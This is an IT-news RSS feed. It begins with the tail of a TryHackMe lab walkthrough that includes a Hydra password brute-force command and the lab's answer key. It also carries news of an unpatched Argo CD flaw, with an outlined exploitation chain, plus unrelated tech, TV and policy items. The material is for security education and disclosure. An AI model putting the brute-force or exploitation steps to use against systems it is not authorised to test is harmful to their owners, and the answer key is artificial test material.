<strong>Medusa</strong> and <strong>Ncrack</strong>.</p><p>For Windows and Active Directory environments, tools like <strong>NetExec</strong> excel at spraying credentials over SMB and LDAP.</p><p>If you manage to dump password hashes from a database, offline tools like <strong>Hashcat</strong> or <strong>John the Ripper </strong>are used because they can guess millions of combinations per second without worrying about network lag or lockouts.</p><h4>Mitigation</h4><p>Defending against password attacks requires a modern approach to identity management:</p><ul><li>Enforce <strong>length-first password policies</strong> based on NIST guidelines. Favor overall length over complex character rotation, and check new passwords against lists of known compromised credentials.</li><li>Implement <strong>strict account lockout</strong> or <strong>throttling mechanisms</strong> to kill automated automated guessing, while remaining aware of password spraying patterns.</li><li>Use <strong>CAPTCHAs</strong> to prevent basic bot execution on login forms.</li><li>Deploy <strong>Multi-Factor Authentication (MFA)</strong> across all external endpoints.</li><li>Transition toward <strong>passwordless ecosystems</strong>, utilizing passkeys (FIDO2/WebAuthn), hardware keys, or verified magic links.</li></ul><p><strong>Question: </strong>One email account is lazie; what password accesses the IMAP service?</p><pre>Command: hydra -l lazie -P /usr/share/wordlists/rockyou.txt MACHINE_IP imap</pre><pre>Answer: butterfly</pre><h3>Key Takeaways</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*35eDunQG0NLCy_K2XVOvtA.jpeg"></figure><p>The fundamental rule of network security is simple:</p><blockquote>Cleartext protocols are inherently insecure.</blockquote><p>Anything sent without encryption can be effortlessly intercepted by sniffing or manipulated via a Man-in-the-Middle attack.</p><p>The security path forward is uniform across all services:</p><ul><li>Use HTTPS instead of HTTP</li><li>Use SSH instead of Telnet</li><li>Use SFTP or FTPS instead of basic FTP</li><li>Use IMAPS, POP3S, and SMTPS instead of their legacy cleartext variants</li></ul><p>Even when a connection is perfectly encrypted, weak passwords remain a glaring vulnerability.</p><p>Secure the protocol with robust encryption, then secure the account with long passwords, rate limiting, and multi-factor authentication.</p><h4>Quick Port Reference Guide</h4><pre>+-------------------+------+----------------+<br>| Protocol          | Port | Security       |<br>+-------------------+------+----------------+<br>| FTP               | 21   | Cleartext      |<br>| FTPS              | 990  | TLS (implicit) |<br>| HTTP              | 80   | Cleartext      |<br>| HTTPS             | 443  | TLS (implicit) |<br>| IMAP              | 143  | Cleartext      |<br>| IMAPS             | 993  | TLS (implicit) |<br>| POP3              | 110  | Cleartext      |<br>| POP3S             | 995  | TLS (implicit) |<br>| SMTP              | 25   | Cleartext      |<br>| SMTP submission   | 587  | STARTTLS       |<br>| SMTPS             | 465  | TLS (implicit) |<br>| SSH / SFTP        | 22   | Encrypted (SSH)|<br>| Telnet            | 23   | Cleartext      |<br>+-------------------+------+----------------+</pre><p><em>Room: Protocols and Servers 2 — TryHackMe (</em><a href="https://tryhackme.com/room/protocolsandservers2"><em>https://tryhackme.com/room/protocolsandservers2</em></a><em>). This writeup is for educational purposes; only test systems you’re authorized to. Have fun!</em></p><p><em>This article was written by Pop123 as a walkthrough for the TryHackMe lab. I am as always open to further discussing the topic.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=42c2d01f5c6c" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/protocols-and-servers-2-tryhackme-writeup-42c2d01f5c6c">Protocols and Servers 2 TryHackMe Writeup</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sugar Season 2 Latest Episode Recap and Ending Explained]]></title>
<description><![CDATA[Sugar Season 2 has returned on Apple TV with John Sugar pulled deeper into a dangerous Los Angeles mystery. The latest episode, Season 2 Episode 3, “Watch Face,” follows Sugar after the shooting and pushes the case toward gang violence, police corruption, and Ji Moon’s strange disappearance.




...]]></description>
<link>https://tsecurity.de/de/3645111/ios-mac-os/sugar-season-2-latest-episode-recap-and-ending-explained/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3645111/ios-mac-os/sugar-season-2-latest-episode-recap-and-ending-explained/</guid>
<pubDate>Sat, 04 Jul 2026 11:21:58 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Sugar Season 2 has returned on Apple TV with John Sugar pulled deeper into a dangerous Los Angeles mystery. The latest episode, Season 2 Episode 3, “Watch Face,” follows Sugar after the shooting and pushes the case toward gang violence, police corruption, and Ji Moon’s strange disappearance.




Episodes: 8 episodes



Genre: Mystery, drama, neo-noir, sci-fi



Started airing: June 19, 2026



Finale date: August 7, 2026



Latest episode: Episode 3, “Watch Face,” released July 3, 2026




Spoilers ahead for Sugar Season 2 Episode 3.







The episode begins right after Sugar survives the attack on his life. His recovery is quick because of his alien blood treatment, but the shooting makes it clear that someone wants him away from the Ji Moon case.



Sugar continues looking into the EZ4 gang and tries to find Guapo, the person linked to the violence around Chuy’s death and Ji’s disappearance. At the same time, Ji finally appears again and contacts Danny, but the meeting goes wrong when Ji mistakes Sugar for a cop and runs away.



The ending becomes more intense when Sugar reaches Guapo. Before Sugar can get real answers, a police raid breaks out and Guapo is killed. The biggest clue comes from a watch, which connects the raid to a corrupt officer and suggests that the danger around Ji goes much higher than one gang.



The episode ends by making Sugar’s case larger than a missing person mystery. Ji is alive, Danny is being pulled toward a risky boxing opportunity, and Sugar now has stronger reason to believe that the police, the gangs, and the hidden “Fire Sale” thread are connected.



Ending Explained



The ending shows that Guapo was never the full answer. His death removes one lead, but it also exposes the larger cover-up around the case.



The watch is the key detail. It links the violent men around the case to someone inside law enforcement, which means Sugar is not just dealing with street-level crime. He is moving toward a conspiracy that can protect itself from inside the system.



Ji running away also matters. He is scared, unstable, and clearly hiding something, but he is not just a victim waiting to be saved. His actions suggest he knows more about the people chasing him, and Danny’s Vegas fight offer may be part of the same trap.



FAQs



When did Sugar Season 2 Episode 3 release? Sugar Season 2 Episode 3, titled “Watch Face,” released on July 3, 2026, on Apple TV.  How many episodes are in Sugar Season 2? Sugar Season 2 has 8 episodes, with new episodes releasing weekly until August 7, 2026.  Is Ji Moon alive in Sugar Season 2 Episode 3? Yes, Ji Moon appears alive in Episode 3, but he escapes after thinking Sugar is a cop.  What does the watch mean in Sugar Season 2 Episode 3? The watch points toward police corruption and connects the ending to the larger mystery around the “Fire Sale” thread.  



Sugar Season 2 is streaming on Apple TV in the US, Apple TV costs $12.99 per month after the trial. What do you plan to watch next? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Cloud sovereignty: First four providers sign up to CISPE certification program]]></title>
<description><![CDATA[The European Union’s drive towards some form of digital sovereignty has just received a boost with the first four companies ready to support the EU cloud sovereignty project.



Four cloud service providers — Etix, Phocea, Thésée Datacenter, and Gigas — have signed up for the CISPE Sovereign and ...]]></description>
<link>https://tsecurity.de/de/3643542/it-security-nachrichten/cloud-sovereignty-first-four-providers-sign-up-to-cispe-certification-program/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643542/it-security-nachrichten/cloud-sovereignty-first-four-providers-sign-up-to-cispe-certification-program/</guid>
<pubDate>Fri, 03 Jul 2026 14:37:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The European Union’s drive towards some form of <a href="https://www.cio.com/article/4038164/why-cios-need-to-respond-to-digital-sovereignty-now.html">digital sovereignty</a> has just received a boost with the first four companies ready to support the EU <a href="https://www.computerworld.com/article/4109029/global-uncertainty-is-reshaping-cloud-strategies-in-europe.html">cloud sovereignty</a> project.</p>



<p>Four cloud service providers — Etix, Phocea, Thésée Datacenter, and Gigas — have signed up for the <a href="https://sovereignty.cispe.cloud/" target="_blank" rel="noreferrer noopener">CISPE Sovereign and Resilient Cloud Service Certification</a> program. Currently, they are all at the self-certification stage and have submitted their services for an independent audit to assess whether they meet the required criteria.</p>



<p>The EU has been pressing hard for a strong European presence in the cloud market. Public bodies are increasingly fearful about exposure of their data to US providers. The <a href="https://www.justice.gov/criminal/cloud-act-resources" target="_blank" rel="noreferrer noopener">US Cloud Act (Clarifying Lawful Overseas Use of Data),</a> for example, permits the US government to access a range of data held by cloud operators, even if that data is held outside the US. This <a href="https://www.networkworld.com/article/4153917/cloud-first-vs-sovereign-first-navigating-the-trade-off.html">legislation conflicts with the EU GDPR Act</a> and has prompted the call for more digital sovereignty across Europe.</p>



<p>“Public bodies, hospitals and industrial operators are today seeking concrete guarantees of digital sovereignty. The CISPE Sovereignty Badge provides that guarantee. It is a natural complement to European standards such as <a href="https://gaia-x.eu/" target="_blank" rel="noreferrer noopener">Gaia-X</a> Level 3, strengthening transparency, compliance and digital trust. It is this ability to provide concrete proof, beyond rhetoric, that underpins genuine European digital autonomy.” said Antoine Fournier, CEO of Thésée Datacenter</p>



<p>The EU is keen to guard against ‘sovereignty washing’ — claims by foreign-owned cloud providers that they meet local control criteria. Last month, <a href="https://www.cispe.cloud/four-european-operators-put-digital-sovereignty-to-the-test-etix-phocea-dc-thesee-datacenter-and-gigas-adopt-the-cispe-certification-framework/">CISPE warned about Broadcom’s claim it complied with EU conditions</a>. It probably won’t be the last to make such claims.</p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cloud sovereignty: First four providers sign up to CISPE certification program]]></title>
<description><![CDATA[The European Union’s drive towards some form of digital sovereignty has just received a boost with the first four companies ready to support the EU cloud sovereignty project.



Four cloud service providers — Etix, Phocea, Thésée Datacenter, and Gigas — have signed up for the CISPE Sovereign and ...]]></description>
<link>https://tsecurity.de/de/3643521/it-nachrichten/cloud-sovereignty-first-four-providers-sign-up-to-cispe-certification-program/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643521/it-nachrichten/cloud-sovereignty-first-four-providers-sign-up-to-cispe-certification-program/</guid>
<pubDate>Fri, 03 Jul 2026 14:32:56 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The European Union’s drive towards some form of <a href="https://www.cio.com/article/4038164/why-cios-need-to-respond-to-digital-sovereignty-now.html">digital sovereignty</a> has just received a boost with the first four companies ready to support the EU <a href="https://www.computerworld.com/article/4109029/global-uncertainty-is-reshaping-cloud-strategies-in-europe.html">cloud sovereignty</a> project.</p>



<p>Four cloud service providers — Etix, Phocea, Thésée Datacenter, and Gigas — have signed up for the <a href="https://sovereignty.cispe.cloud/" target="_blank" rel="nofollow">CISPE Sovereign and Resilient Cloud Service Certification</a> program. Currently, they are all at the self-certification stage and have submitted their services for an independent audit to assess whether they meet the required criteria.</p>



<p>The EU has been pressing hard for a strong European presence in the cloud market. Public bodies are increasingly fearful about exposure of their data to US providers. The <a href="https://www.justice.gov/criminal/cloud-act-resources" target="_blank" rel="nofollow">US Cloud Act (Clarifying Lawful Overseas Use of Data),</a> for example, permits the US government to access a range of data held by cloud operators, even if that data is held outside the US. This <a href="https://www.networkworld.com/article/4153917/cloud-first-vs-sovereign-first-navigating-the-trade-off.html">legislation conflicts with the EU GDPR Act</a> and has prompted the call for more digital sovereignty across Europe.</p>



<p>“Public bodies, hospitals and industrial operators are today seeking concrete guarantees of digital sovereignty. The CISPE Sovereignty Badge provides that guarantee. It is a natural complement to European standards such as <a href="https://gaia-x.eu/" target="_blank" rel="nofollow">Gaia-X</a> Level 3, strengthening transparency, compliance and digital trust. It is this ability to provide concrete proof, beyond rhetoric, that underpins genuine European digital autonomy.” said Antoine Fournier, CEO of Thésée Datacenter</p>



<p>The EU is keen to guard against ‘sovereignty washing’ — claims by foreign-owned cloud providers that they meet local control criteria. Last month, <a href="https://www.cispe.cloud/four-european-operators-put-digital-sovereignty-to-the-test-etix-phocea-dc-thesee-datacenter-and-gigas-adopt-the-cispe-certification-framework/" rel="nofollow">CISPE warned about Broadcom’s claim it complied with EU conditions</a>. It probably won’t be the last to make such claims.</p>



<p><em>This article first appeared on <a href="https://www.networkworld.com/article/4192767/cloud-sovereignty-first-four-providers-sign-up-to-cispe-certification-program.html">Network World</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Finally Switched to Wayland (This is gonna be a long one)]]></title>
<description><![CDATA[I finally had enough down time a couple of weeks ago to start the process of migrating to Wayland. I figured I'd share my experience for anyone who (like me) was/is concerned about how difficult the process may be or what changes may be required for someone who uses a more "niche" setup. Context ...]]></description>
<link>https://tsecurity.de/de/3642587/linux-tipps/finally-switched-to-wayland-this-is-gonna-be-a-long-one/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642587/linux-tipps/finally-switched-to-wayland-this-is-gonna-be-a-long-one/</guid>
<pubDate>Fri, 03 Jul 2026 04:08:15 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I finally had enough down time a couple of weeks ago to start the process of migrating to Wayland. I figured I'd share my experience for anyone who (like me) was/is concerned about how difficult the process may be or what changes may be required for someone who uses a more "niche" setup.</p> <p><strong>Context</strong><br> My primary device is a Thinkpad X280. My backup is essentially a mirrored setup on a T480s. I've been using Arch/Arch derivatives for well over a decade now, and I'm currently on Artix Linux. My main X11 workflow was DWM (heavily patched) with the typical suite of supporting apps (dmenu, rofi, st, dunst, dwmblocks, etc). My daily workflow centers heavily around the tags system with simple startup scripts depending on which apps I need for work on any given day versus when I'm just using casual email/browsing apps. Most daily apps are assigned to specific tags and I HEAVILY depend on the ability to right click a tag to show it's windows on another tag temporarily (for example, pulling over a floating browser quickly to research something then sending it back to it's home tag when I'm done). The other important aspect is my use of a 3rd gen Lenovo thunderbolt dock for swapping to a dual display setup when needed for more complex work flows.</p> <p><strong>The Switch</strong><br> I switched to MangoWM with waybar. The switch was relatively painless, as MangoWM is pretty much a prebuilt version of DWL with all the available patches most people would want, which is essentially the wayland version of DWM. I chose Mango of DWL mainly because the stagnant/slow development of DWL means it often falls behind current Wayland functionality, which is quite relevant since Wayland is VERY MUCH still a work-in-progress. The only real issues I ran into were configuring waybar and setting up tag/window rules. I eventually figured out the waybar stuff through reading docs and watching YouTube. Once figured out, it was quite simple to create a setup superior to my prior dwmblocks setup. The window rules were slightly more annoying because I learned that wayland identifies windows by their "appid" vs X11's method of using the "class". To make this more tedious, there's no true equivalent for xprop, so I had to learn how to use Mango's built-in IPC to find the appid I was looking for (grep will be very useful). Mango further complicates (or simplifies?) this by using a pseudo-fuzzy search algorithm for identifying the appid. For example, if I want to set a window rule for a PWA made through firefox, I don't have to quote the entire appid. I can just extract a unique string of characters from the appid and Mango will recognize it (pretty nifty once you get used to it).</p> <p><strong>Pros</strong><br> I'll truncate this since the post is already unreasonably long.</p> <ul> <li>Wayland is just smoother than X11/XLibre</li> <li>Built in compositing removes the need for picom/fastcompmgr</li> <li>Despite much of what I saw online before switching, resource usage is actually measurably less on my MangoWM setup vs my prior DWM setup</li> <li>Battery life actually improved for me (anywhere between 30 mins to 1.5 hours depending on usage)</li> <li>Many random X11-specific packages/config files are simply no longer necessary (xinit, xprop, XAUTHORITY, etc)</li> <li>MangoWM is just more pleasant to use with the built in transparency, blur, and simpler animations. Animations aren't a must for me, but I do have fond memories of compiz when my browser opens with a subtle zoom effect versus just popping into place</li> </ul> <p><strong>Cons</strong></p> <ul> <li>Trying to run a system without xwayland comes with MANY compromises depending on your workflow</li> <li>Many popular apps like virtualbox, steam, and bitwarden can't even launch without xwayland (which kinda feels like it defeats the purpose of moving away from X11). Zoom works, but completely messes with keyboard shortcuts, which led me to just switch to a PWA. I also swapped to a PWA for bitwarden, but didn't have simple alternatives to virtualbox and steam, so I ended up biting the bullet and installing xwayland</li> <li>Some apps simply won't work - even with xwayland (spacefm and megasync for me). I was able to get around the megasyc issue by switching to megaCMD and I begrudgingly swapped back to PCManFM with gvfs for file management</li> <li>While some "X11-specific" tools are no longer needed, their functionality simply isn't properly replicated for more advanced/niche workflows. For example, while "appid" is mostly a sufficient replacement for "Window Class" when setting up window rules, there are still some weird inconsistencies if you're used to the behavior under X11</li> </ul> <p>There's a lot more that could be said, but this post already risks being reported because of the length, so here's the TLDR. Wayland is very much usable in 2026 and is actually a better general computing experience than X11 for me. However, it does require some compromises and changes in your workflow. Despite what the vocal minority online says, much of the functionality that wayland lacks in comparison to xorg is very hyper-specific and only a small subset of users cannot replicate or find a reasonable alternative on wayland. I still see significant value in X11/XLibre maintenance depending on your use case, but as for me and my house, we will be transitioning to wayland</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/chozendude"> /u/chozendude </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1uls4cr/finally_switched_to_wayland_this_is_gonna_be_a/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1uls4cr/finally_switched_to_wayland_this_is_gonna_be_a/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[EasyOptOuts Review: A Budget-Friendly Service You Can Set and Forget]]></title>
<description><![CDATA[EasyOptOuts performs just as well as other data removal services at a fraction of the price, but you give up some transparency and regular security audits.]]></description>
<link>https://tsecurity.de/de/3641235/it-nachrichten/easyoptouts-review-a-budget-friendly-service-you-can-set-and-forget/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641235/it-nachrichten/easyoptouts-review-a-budget-friendly-service-you-can-set-and-forget/</guid>
<pubDate>Thu, 02 Jul 2026 15:03:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[EasyOptOuts performs just as well as other data removal services at a fraction of the price, but you give up some transparency and regular security audits.]]></content:encoded>
</item>
<item>
<title><![CDATA[How Congress Can Regulate Military Promotions After Trump v. Slaughter]]></title>
<description><![CDATA[To restore transparency and accountability, Congress should reform the statutory authorities to remove officers from promotion lists and delay promotions.
The post How Congress Can Regulate Military Promotions After Trump v. Slaughter appeared first on Just Security.]]></description>
<link>https://tsecurity.de/de/3641176/it-security-nachrichten/how-congress-can-regulate-military-promotions-after-trump-v-slaughter/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641176/it-security-nachrichten/how-congress-can-regulate-military-promotions-after-trump-v-slaughter/</guid>
<pubDate>Thu, 02 Jul 2026 14:40:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>To restore transparency and accountability, Congress should reform the statutory authorities to remove officers from promotion lists and delay promotions.</p>
<p>The post <a href="https://www.justsecurity.org/145245/congress-hegseth-military-promotions/">How Congress Can Regulate Military Promotions After &lt;i&gt;Trump v. Slaughter&lt;/i&gt;</a> appeared first on <a href="https://www.justsecurity.org/">Just Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Argo CD flaw shows why GitOps infrastructure should be treated as tier zero]]></title>
<description><![CDATA[A newly disclosed vulnerability in Argo CD is drawing attention to the security risks of GitOps platforms, with researchers warning that the flaw could allow attackers who gain a foothold inside a Kubernetes cluster to execute code and manipulate application deployments.



Security firm Synackti...]]></description>
<link>https://tsecurity.de/de/3640960/ai-nachrichten/argo-cd-flaw-shows-why-gitops-infrastructure-should-be-treated-as-tier-zero/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640960/ai-nachrichten/argo-cd-flaw-shows-why-gitops-infrastructure-should-be-treated-as-tier-zero/</guid>
<pubDate>Thu, 02 Jul 2026 13:33:25 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A newly disclosed vulnerability in Argo CD is drawing attention to the security risks of GitOps platforms, with researchers warning that the flaw could allow attackers who gain a foothold inside a Kubernetes cluster to execute code and manipulate application deployments.</p>



<p>Security firm Synacktiv said in a <a href="https://www.synacktiv.com/en/publications/caught-in-the-octopus-trap-unauthenticated-rce-in-argo-cd-with-codeql" target="_blank" rel="noreferrer noopener">report</a> that the flaw affects Argo CD’s repo-server component, which fetches content from Git repositories and generates Kubernetes manifests used to deploy resources in a cluster. Argo CD is one of the most popular Kubernetes tools and is based on the GitOps paradigm.</p>



<p>“Argo CD requires significant privileges within the cluster,” Synacktiv said. “Additionally, it has access to private Git repositories, making it an attractive target for attackers.”</p>



<p>The issue centers on the repo-server’s unauthenticated GenerateManifest gRPC endpoint. Synacktiv said an attacker able to reach that endpoint could supply Kustomize options in a manifest generation request and abuse Kustomize’s Helm-related build options to execute attacker-controlled commands.</p>



<p>Exploitation requires access to both the repo-server gRPC port and the Redis database port, which should not be exposed to users. Argo CD provides Kubernetes network policies designed to prevent that scenario, but those protections are not enabled by default in Helm chart deployments, according to Synacktiv.</p>



<p>In such deployments, compromising a single pod inside the cluster could be enough to give an attacker the internal access needed to exploit the vulnerability.</p>



<p>Synacktiv said it was able to use the flaw to obtain the Redis password from the repo-server environment and access Argo CD’s Redis database. The researchers then manipulated cached deployment data, allowing a malicious manifest to be deployed automatically when Argo CD’s Auto Sync feature was enabled.</p>



<p>If Auto Sync is not enabled, exploitation would require a user to manually sync the application.</p>



<p>Synacktiv publicly disclosed the details on July 1 after first reporting the issue to Argo CD maintainers in January 2025. The vulnerability remains unpatched, and the firm recommended strict Kubernetes network policies to block untrusted pods from reaching the repo-server and Redis services until a fix is available.</p>



<h2 class="wp-block-heading">Assessing internal cluster exposure</h2>



<p>For CISOs, the key question is not only whether Argo CD is exposed to the internet, but whether <a href="https://www.csoonline.com/article/4151367/why-kubernetes-controllers-are-the-perfect-backdoor.html">other workloads</a> inside the Kubernetes cluster can reach its internal services.</p>



<p>“Because the repo-server’s gRPC service does not enforce authentication, any pod that can reach it becomes equivalent to an authenticated attacker,” said <a href="https://www.linkedin.com/in/devashri-datta-522b364b/" target="_blank" rel="noreferrer noopener">Devashri Datta</a>, a cybersecurity researcher. “In a typical cluster, that means any compromised application pod, misconfigured service mesh, or adjacent workload with local code execution can directly query the GenerateManifest endpoint or hit the Redis cache, no internet exposure required.”</p>



<p>Organizations should not equate “not internet-facing” with “low risk,” because modern attacks often begin with the compromise of an internal workload, according to <a href="https://my.idc.com/getdoc.jsp?containerId=PRF005665" target="_blank" rel="noreferrer noopener">Sakshi Grover</a>, senior research manager for cybersecurity services research at IDC Asia/Pacific.</p>



<p>“CISOs should therefore evaluate which workloads can communicate with the Argo CD control plane, whether east-west traffic is appropriately segmented, and whether unnecessary trust relationships exist between application workloads and GitOps infrastructure,” Grover said. “The assessment should focus on attack paths rather than perimeter exposure.”</p>



<h2 class="wp-block-heading">Treating GitOps as tier-zero</h2>



<p>The flaw also underscores the role GitOps platforms play in controlling software deployment across enterprise infrastructure.</p>



<p>“GitOps engines aren’t utility services; they’re tier-0 control-plane components,” Datta said. “By design, Argo CD holds read access to private repositories, sync/write access to target clusters, and custody of deployment secrets. It sits at the precise intersection of source code, configuration management, and live infrastructure.”</p>



<p>That level of access means an Argo CD compromise may extend beyond a single application. An attacker could turn the platform used to deploy applications into a channel for malicious manifests, while also interfering with auto-sync behavior and extracting credentials cached in supporting systems such as Redis.</p>



<p>A compromise of these platforms could influence <a href="https://www.csoonline.com/article/4165420/sap-npm-package-attack-highlights-risks-in-developer-tools-and-ci-cd-pipelines.html">software delivery at scale</a>, making them strategic assets that should be subject to stricter governance and privileged access controls similar to those applied to identity platforms and other critical management systems.</p>



<p><em>The article originally appeared on <a href="https://www.csoonline.com/article/4192188/argo-cd-flaw-shows-why-gitops-infrastructure-should-be-treated-as-tier-zero.html">CSO</a></em>.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Argo CD flaw shows why GitOps infrastructure should be treated as tier zero]]></title>
<description><![CDATA[A newly disclosed vulnerability in Argo CD is drawing attention to the security risks of GitOps platforms, with researchers warning that the flaw could allow attackers who gain a foothold inside a Kubernetes cluster to execute code and manipulate application deployments.



Security firm Synackti...]]></description>
<link>https://tsecurity.de/de/3640930/it-security-nachrichten/argo-cd-flaw-shows-why-gitops-infrastructure-should-be-treated-as-tier-zero/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640930/it-security-nachrichten/argo-cd-flaw-shows-why-gitops-infrastructure-should-be-treated-as-tier-zero/</guid>
<pubDate>Thu, 02 Jul 2026 13:23:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A newly disclosed vulnerability in Argo CD is drawing attention to the security risks of GitOps platforms, with researchers warning that the flaw could allow attackers who gain a foothold inside a Kubernetes cluster to execute code and manipulate application deployments.</p>



<p>Security firm Synacktiv said in a <a href="https://www.synacktiv.com/en/publications/caught-in-the-octopus-trap-unauthenticated-rce-in-argo-cd-with-codeql" target="_blank" rel="noreferrer noopener">report</a> that the flaw affects Argo CD’s repo-server component, which fetches content from Git repositories and generates Kubernetes manifests used to deploy resources in a cluster. Argo CD is one of the most popular Kubernetes tools and is based on the GitOps paradigm.</p>



<p>“Argo CD requires significant privileges within the cluster,” Synacktiv said. “Additionally, it has access to private Git repositories, making it an attractive target for attackers.”</p>



<p>The issue centers on the repo-server’s unauthenticated GenerateManifest gRPC endpoint. Synacktiv said an attacker able to reach that endpoint could supply Kustomize options in a manifest generation request and abuse Kustomize’s Helm-related build options to execute attacker-controlled commands.</p>



<p>Exploitation requires access to both the repo-server gRPC port and the Redis database port, which should not be exposed to users. Argo CD provides Kubernetes network policies designed to prevent that scenario, but those protections are not enabled by default in Helm chart deployments, according to Synacktiv.</p>



<p>In such deployments, compromising a single pod inside the cluster could be enough to give an attacker the internal access needed to exploit the vulnerability.</p>



<p>Synacktiv said it was able to use the flaw to obtain the Redis password from the repo-server environment and access Argo CD’s Redis database. The researchers then manipulated cached deployment data, allowing a malicious manifest to be deployed automatically when Argo CD’s Auto Sync feature was enabled.</p>



<p>If Auto Sync is not enabled, exploitation would require a user to manually sync the application.</p>



<p>Synacktiv publicly disclosed the details on July 1, 2026, after first reporting the issue to Argo CD maintainers in January 2025. The vulnerability remains unpatched, and the firm recommended strict Kubernetes network policies to block untrusted pods from reaching the repo-server and Redis services until a fix is available.</p>



<h2 class="wp-block-heading">Assessing internal cluster exposure</h2>



<p>For CISOs, the key question is not only whether Argo CD is exposed to the internet, but whether <a href="https://www.csoonline.com/article/4151367/why-kubernetes-controllers-are-the-perfect-backdoor.html">other workloads</a> inside the Kubernetes cluster can reach its internal services.</p>



<p>“Because the repo-server’s gRPC service does not enforce authentication, any pod that can reach it becomes equivalent to an authenticated attacker,” said <a href="https://www.linkedin.com/in/devashri-datta-522b364b/" target="_blank" rel="noreferrer noopener">Devashri Datta</a>, a cybersecurity researcher. “In a typical cluster, that means any compromised application pod, misconfigured service mesh, or adjacent workload with local code execution can directly query the GenerateManifest endpoint or hit the Redis cache, no internet exposure required.”</p>



<p>Organizations should not equate “not internet-facing” with “low risk,” because modern attacks often begin with the compromise of an internal workload, according to <a href="https://my.idc.com/getdoc.jsp?containerId=PRF005665" target="_blank" rel="noreferrer noopener">Sakshi Grover</a>, senior research manager for cybersecurity services research at IDC Asia/Pacific.</p>



<p>“CISOs should therefore evaluate which workloads can communicate with the Argo CD control plane, whether east-west traffic is appropriately segmented, and whether unnecessary trust relationships exist between application workloads and GitOps infrastructure,” Grover said. “The assessment should focus on attack paths rather than perimeter exposure.”</p>



<h2 class="wp-block-heading">Treating GitOps as tier-zero</h2>



<p>The flaw also underscores the role GitOps platforms play in controlling software deployment across enterprise infrastructure.</p>



<p>“GitOps engines aren’t utility services; they’re tier-0 control-plane components,” Datta said. “By design, Argo CD holds read access to private repositories, sync/write access to target clusters, and custody of deployment secrets. It sits at the precise intersection of source code, configuration management, and live infrastructure.”</p>



<p>That level of access means an Argo CD compromise may extend beyond a single application. An attacker could turn the platform used to deploy applications into a channel for malicious manifests, while also interfering with auto-sync behavior and extracting credentials cached in supporting systems such as Redis.</p>



<p>A compromise of these platforms could influence <a href="https://www.csoonline.com/article/4165420/sap-npm-package-attack-highlights-risks-in-developer-tools-and-ci-cd-pipelines.html">software delivery at scale</a>, making them strategic assets that should be subject to stricter governance and privileged access controls similar to those applied to identity platforms and other critical management systems.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How AI automation is reshaping the IT leadership pipeline]]></title>
<description><![CDATA[In the wake of AI, the early-talent job market is in decline across all jobs and industries, with a 10% drop since 2021, according to a recent report from SAP. When isolated for the top 10 most common entry level job titles, including software engineer, customer support, and data analyst, job ope...]]></description>
<link>https://tsecurity.de/de/3640731/it-nachrichten/how-ai-automation-is-reshaping-the-it-leadership-pipeline/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640731/it-nachrichten/how-ai-automation-is-reshaping-the-it-leadership-pipeline/</guid>
<pubDate>Thu, 02 Jul 2026 12:03:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
